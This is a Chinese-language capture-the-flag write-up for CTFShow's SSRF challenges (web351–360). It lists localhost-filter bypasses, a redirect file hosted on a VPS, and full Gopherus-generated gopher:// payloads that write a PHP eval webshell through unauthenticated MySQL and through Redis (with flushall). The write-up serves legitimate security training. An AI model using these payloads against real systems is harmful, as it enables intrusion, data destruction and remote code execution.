CTFShow-SSRF(writeup)

简介: CTFShow-SSRF(writeup)

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)

题目:

web351:

payload:url=127.0.0.1/flag.php

得到flag

web352:

过滤了localhost和127.0.0

1. 
2. url=http://0/flag.php
3. 
4. url=http://0.0.0.0/flag.php
5. 
6. url=http://0x7f.0.0.1/flag.php
7. 
8. url=http://0177.0.0.1/flag.php
9. 
10. url=http://127.1/flag.php
11. 
12. 
13.

web353:

web354:

过滤了127 0 1 *

1. 
2.  url=http://sudo.cc/flag.php
3. 
4.

web355:

限定了协议http或者https

同时主机名长度小于5

1. 
2. url=http://127.1/flag.php
3. 
4. url=http://0/flag.php
5. 
6.

web356:

限定了协议http或者https

同时主机名长度小于3

1. 
2. url=http://0/flag.php
3. 
4.

web357:

1. yum install httpd
2. yum install php php-devel

vps /var/www/html/下创建ssrf.php

ssrf.php内容:

1. <?php
2. 
3. header("Location: http://127.0.0.1/flag.php");
4. 
5. ?>

注意:不但要安装httpd,还要安装php

[root@VM-4-10-centos ~]# yum install php php-devel

否则题目只会回显vps的ip,不会回显flag.

如下所示:

没有解析ssrf.php

web358:

1. 
2. url=http://ctf.@127.0.0.1/flag.php?show
3. 
4.

具体原理:如果不在ctf.后面加@,解析url时会把ctf.也解析成host的内容,如果不在show前面加#?,会把show也解析到path中,得不到想要的结果

web359:

题目提示:打无密码的mysql

点击题目的链接,进入如下界面,点击login

进入到check.php

下载gopherus脚本,注意运行环境python2

https://github.com/tarunkant

命令:

python2 gopherus.py --exploit mysql

1. root
2. 
3. select '<?php eval($_POST[cmd]);?>' into outfile '/var/www/html/ssrf.php'

将gopher://127.0.0.1:3306/_后面的字符再进行一次url编码,然后执行

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4a%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%63%6d%64%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%73%73%72%66%2e%70%68%70%27%01%00%00%00%01

查看ssrf.php是否写入成功

body中命令执行查看flag

web360:

题目提示:redis

题目:

利用gopherus脚本生成payload

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2430%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5Bcmd%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

gopher://127.0.0.1:6379/_后面的字符再进行一次url编码,然后url传参,写入shell.php

在shell.php下查看flag的位置

查看flag的内容


相关文章
|
缓存 达摩院 Kubernetes
数据缓存系列分享(六):通义千问Qwen-14B大模型快速体验
阿里达摩院近期对通义千问大模型 Qwen-14B 进行了开源(之前开源的是Qwen-7B模型),目前在ModelScope和HuggingFace上均可直接下载。关于Qwen-7B的搭建可以参考我们之前的文章:数据缓存系列分享(五):开源大语言模型通义千问快速体验版,本文将使用一样的方式打开Qwen-14B,快速体验一下。
2683 0
数据缓存系列分享(六):通义千问Qwen-14B大模型快速体验
|
存储 SQL 缓存
Ctfshow web入门 PHP特性篇 web89-web151 全(一)
Ctfshow web入门 PHP特性篇 web89-web151 全(一)
1671 0
|
SQL 监控 安全
命令注入攻击
【8月更文挑战第17天】
1073 2
|
存储 SQL PHP
Ctfshow web入门 PHP特性篇 web89-web151 全(三)
Ctfshow web入门 PHP特性篇 web89-web151 全(三)
921 2
|
SQL Oracle 关系型数据库
Oracle19c静默部署文档
本文档详细介绍了如何在Linux环境下静默部署Oracle 19c数据库。内容涵盖系统基础配置、用户及目录创建、系统配置文件修改、数据库安装与配置、监听配置与启动,以及数据库的启动与关闭操作。此外,还提供了SQL*Plus的改进方法和Navicat远程连接Oracle的解决方案。通过步骤化的指导,帮助读者顺利完成Oracle 19c的安装与配置。文档适用于Oracle 21C及之前的版本,附带多张示意图,便于理解和操作
Oracle19c静默部署文档
|
安全 NoSQL 网络协议
SSRF内网打穿相关姿势
本文详细介绍了服务器端请求伪造(SSRF)漏洞,包括其定义、漏洞场景、常见漏洞函数、URL伪协议及其利用方法。通过具体的靶机示例,展示了如何利用SSRF漏洞进行内网探测、命令执行、SQL注入、命令注入、XXE注入、Tomcat任意文件上传和Redis未授权访问等攻击。文章还提供了相关工具和参考资料,帮助读者更好地理解和应对SSRF漏洞。
1924 0
SSRF内网打穿相关姿势
|
算法 安全 PHP
24-9-24-CTFweb爆破-学习笔记
本文档详细记录了CTFshow平台上的Web安全挑战学习过程,包括条件爆破、伪随机数爆破及目录遍历等多种攻击手法。通过分析PHP的`substr()`函数与MD5加密特性,实现对特定条件的token爆破;利用Mersenne Twister算法的伪随机数生成机制破解随机数挑战;通过身份证信息爆破获取账户密码;最后通过目录遍历技术找到隐藏的flag。提供了完整的脚本示例,帮助读者理解和实践各种爆破技巧。
|
监控 NoSQL Java
使用redis生成全局id
使用redis生成全局id
506 0
|
安全 网络安全 数据安全/隐私保护
Pikachu CSRF 通关解析
Pikachu 靶场 CSRF 通关解析
|
前端开发 安全 应用服务中间件
CTFShow-WEB入门篇文件上传详细Wp(151-170)
CTFShow-WEB入门篇文件上传详细Wp(151-170)
2153 0